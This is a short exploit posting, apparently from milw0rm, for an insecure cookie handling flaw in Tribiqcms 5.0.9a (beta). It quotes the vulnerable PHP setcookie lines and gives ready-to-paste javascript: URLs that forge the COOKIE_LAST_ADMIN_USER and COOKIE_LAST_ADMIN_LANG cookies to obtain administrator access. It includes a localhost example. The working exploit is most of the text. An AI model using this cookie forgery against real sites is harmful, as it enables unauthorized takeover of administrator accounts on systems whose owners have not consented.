Tribiqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability

Tribiqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability

Discovered By: ZoRLu

code:

setcookie ("COOKIE_LAST_ADMIN_USER", $newAdmin["username"], time()+8640000, '/');
setcookie ("COOKIE_LAST_ADMIN_LANG", $newAdmin["use_language_id"], time()+8640000, '/');


Exploit:

javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";

example for my localhost:

javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=zorlu; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";

kaynak: http://www.milw0rm.com/exploits/6886